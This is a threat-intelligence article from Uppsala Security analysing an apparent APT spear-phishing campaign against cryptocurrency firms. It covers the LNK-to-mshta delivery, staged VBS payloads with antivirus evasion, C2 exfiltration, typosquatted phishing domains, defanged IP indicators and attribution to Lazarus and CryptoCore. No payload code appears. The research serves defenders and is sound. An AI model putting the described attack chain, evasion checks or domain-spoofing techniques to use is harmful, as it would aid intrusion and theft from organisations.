APT Group Targeting Cryptocurrency Industries — Debunked

By: Athul Harilal (Security Researcher) and Nobel Tan (Head of Engineering & Product)

In this article, we summarize our findings of an APT (Advanced Persistent Threat) group targeting multiple enterprises in the cryptocurrency domain. The APT group uses spear phishing techniques via email to get a foothold on the victim machine that results in downloading multiple payloads from the phishing or C2 server to exfiltrate information. Our findings show that APT group uses separate infrastructure for hosting phishing and C2 servers, which have links to DPRK based Lazarus APT group and CryptoCore APT group involved in compromising multiple cryptocurrency exchanges. We have shared IOC findings in this research to interested individuals.

Modus Operandi of the APT Group

Fig 1: Modus Operandi

From our investigation, we uncovered 4 stages of operation used by the threat actor group to infect and exfiltrate information from victim machines.

Stage 1: As shown in Fig 1, cryptocurrency organization victims receive a zip file from the threat actor group via a spear phishing email. It contains a password protected decoy pdf/word document and a masqueraded password file containing the password to open the decoy document.

Stage 2: Static analysis of the password file shown in Fig 2 reveals that it is a windows shortcut lnk file, which contacts the phishing server of the threat actor group through a bit[.]ly link executed using mshta Windows process. The phishing server returns a malicious vbs payload (VBS Payload 1) that is often undetected by antivirus softwares. Similarly, usage of bit[.]ly link also provides malicious actors with some advantages. It reduces suspicion by masking the original link from end users and provides click statistics of victims according to their geographic location.

Fig 2: Static Information of Password.txt.lnk file

Stage 3: Once VBS Payload 1 is obtained from the phishing server, it first generates a Password.txt file with the password as “riskreview” in order to open the password protected decoy pdf document as shown in Fig 3.

Fig 3: Generating password file from VBS Payload 1

This is followed by extracting the next stage payload (VBS Payload 2) from it’s base64 encoded form and storing it in the %TEMP% folder of Windows as shown in Fig 4. It also checks for antivirus processes (kwsprot, npprot, hudongf and qhsafe) for evading detection and deciding whether it should enable persistence mechanism before exiting.

Fig 4: Getting VBS Payload 2 from VBS Payload 1

Lastly in stage 3, VBS Payload 2 is executed and it contacts C2 server 140.117.91[.]22 using port 8080 in order to get VBS Payload 3 as shown in Fig 5.

Fig 5: VBS Payload 2 Code snippet

Table 1: Functions of VBS Payload 3 collecting information from the victim machine

Stage 4: VBS Payload 3 is designed to exfiltrate information from the victim machine to C2 server as shown in Table 1. In order to do so, they use 3 functions namely getInfo, getUName and getProc. After sending this information to the C2 server, the returned response is checked for further commands to be executed on the victim machine. If the response begins with “20#” or “23#”, then subsequent bytes contain the next commands to be executed on the victim machine, as shown in Fig 6.

Fig 6: Checks on Response from C2 server

Phishing Infrastructure

Table 2: Types of Organizations mimicked by threat actor group

In order to understand the phishing infrastructure of the APT group, we gathered multiple bit[.]ly links used by the threat actor group and obtained the subsequent redirected phishing urls resolved by the bitly service and their resolved ip addresses shown in Fig 7.

Fig 7: Conversion of bit[.]ly link to phishing url and associated ip address

After obtaining the phishing urls, we mapped out the phishing domain controlled by the threat actor with the original domain controlled by a legitimate organization in order to understand the type of organizations threat actors tried to impersonate as shown in Table 2. It outlines a concise list of organizations that includes cryptocurrency exchanges, cyber security firms, marketing firms and others like cloud storage firms. The list shows that the threat actor group mimics not only organizations directly involved with cryptocurrency, but also third party organizations providing services to the former.

From our investigation, the threat actor group uses 3 techniques for generating phishing domain similar to the original domain.

1. Changing the Top Level Domain (TLD): privacyshield[.]gov -> privacyshield[.]services
2. Miniscule change in the hostname, TLD or both: digifinex[.]com -> digifincx[.]com
3. Significant but believable change: bli[.]live -> blockchaintransparency[.]institute

Lastly, although the threat actor group uses a number of domains, they resolve to a small set of IP addresses shown in Table 3. As of writing this article, the threat actor groups used hosting providers in the USA and Germany, exposing only port 80 (http) for communication.

Table 3: IP information of Phishing infrastructure

C2 Server Infrastructure

Table 4: IP Information of C2 Infrastructure

From our investigation, we found 3 main entities being used as Command and Control (C2) servers. They differ from phishing servers in 2 ways. These servers have multiple open ports pertaining to services such as VNC, RDP, MS-SQL as opposed to a single port 80 opened in phishing infrastructure. We also found evidence of some entities being compromised previously, hinting that some of them could belong to legitimate organizations.

Fig 7: Information of entity 128.201.64[.]194 from Shodan

Analysis of entity 128.201.64[.]194 from Shodan¹ showed that it is a Mikrotik router located in Brazil as shown in Fig 7. In the second half of 2018 more than 200,000 Mikrotik routers were compromised² to run cryptocurrency miners of which majority of them were located in Brazil. Instances of php were found to be running in the compromised router by affected users and later confirmed by Mikrotik officials³. We found similar php applications hosted in this entity. Mikrotik routers have also been used previously as a stepping stone to plant spyware inside target organizations, such as Operation Slingshot⁴ uncovered by Kaspersky. These findings led us to believe that entity 128.201.64[.]194 is possibly a compromised Mikrotik router.

While entities 203.144.133[.]42 and 66.181.166[.]15 have multiple identical services running such as Microsoft IIS, MS-SQL, Microsoft HTTP-API and RDP/VNC as of writing this article. We have observed intermittent exposure of RDP/VNC services within these entities that are commonly used for lateral movement or as first stage intrusion⁵ into the target organization. Entity 66.181.166[.]15 is also observed to expose ftp service from time to time that could contain information collected from victim machines. However, from our current findings we are unable to conclude whether entities 203.144.133[.]42 and 66.181.166[.]15 are compromised or originally belonging to the threat actor group.

Attribution

Based on the indicators of compromise (IOC’s) generated from our investigation, we found a number of matching IOC’s with 2 other research articles based on threat actor groups targeting cryptocurrency organizations using a similar modus operandi uncovered by us.

The first research conducted by cybersecurity firm Clearsky attributed them to CryptoCore⁶ that has links to the East European region, Ukraine, Russia or Romania in particular. They revealed that this group targets cryptocurrency exchanges by getting hold of their password manager account. Similarly Group IB⁷ had also previously reported threat actors using malicious software such as AZORult, Pony Formgrabber and Qbot to get private keys of cryptocurrency wallets. While the second research conducted by F-Secure attributed the threat actor group to DPRK based Lazarus group⁸. Although the threat actor group investigated by us share a number of characteristics with the above mentioned research works, we need more evidence to conclusively establish the attribution.

Acknowledgements

We would like to thank our partner NSHC⁹ for their valuable inputs on this investigation.

[1] “Shodan.io.” https://www.shodan.io/. Accessed 3 Sep. 2020.

[2] “Over 200000 MikroTik Routers Compromised in … — Trend Micro.” 3 Aug. 2018, https://www.trendmicro.com/vinfo/sg/security/news/cybercrime-and-digital-threats/over-200-000-mikrotik-routers-compromised-in-cryptojacking-campaign. Accessed 2 Sep. 2020.

[3] “Mikrotik Routers Compromised……please READ — MikroTik.” 25 Jul. 2018, https://forum.mikrotik.com/viewtopic.php?t=137270. Accessed 2 Sep. 2020.

[4] “Router-Hacking ‘Slingshot’ Spy Operation Compromised More ….” 9 Mar. 2018, https://www.wired.com/story/router-hacking-slingshot-spy-operation-compromised-more-than-100-targets/. Accessed 2 Sep. 2020.

[5] “Fxmsp: “The invisible god of networks” — Group-IB.” https://www.group-ib.com/resources/threat-research/fxmsp-report.html. Accessed 2 Sep. 2020.

[6] “CryptoCore Group — ClearSky Cyber Security.” 24 Jun. 2020, https://www.clearskysec.com/cryptocore-group/. Accessed 2 Sep. 2020.

[7] “2018 Cryptocurrency Exchanges. User Accounts … — Group-IB.” https://www.group-ib.com/resources/threat-research/cryptocurrency-exchanges.html. Accessed 2 Sep. 2020.

[8] “Threat Intelligence Report: Lazarus Group Campaign ….” 25 Aug. 2020, https://labs.f-secure.com/publications/ti-report-lazarus-group-cryptocurrency-vertical. Accessed 2 Sep. 2020.

[9] “NSHC Security Training.” https://st.nshc.net/en/. Accessed 8 Sep. 2020.

Uppsala Security is headquartered in Singapore and has branch offices in Seoul, South Korea and Tokyo, Japan. Follow Uppsala Security on Telegram, LinkedIn, Twitter, Facebook and Medium.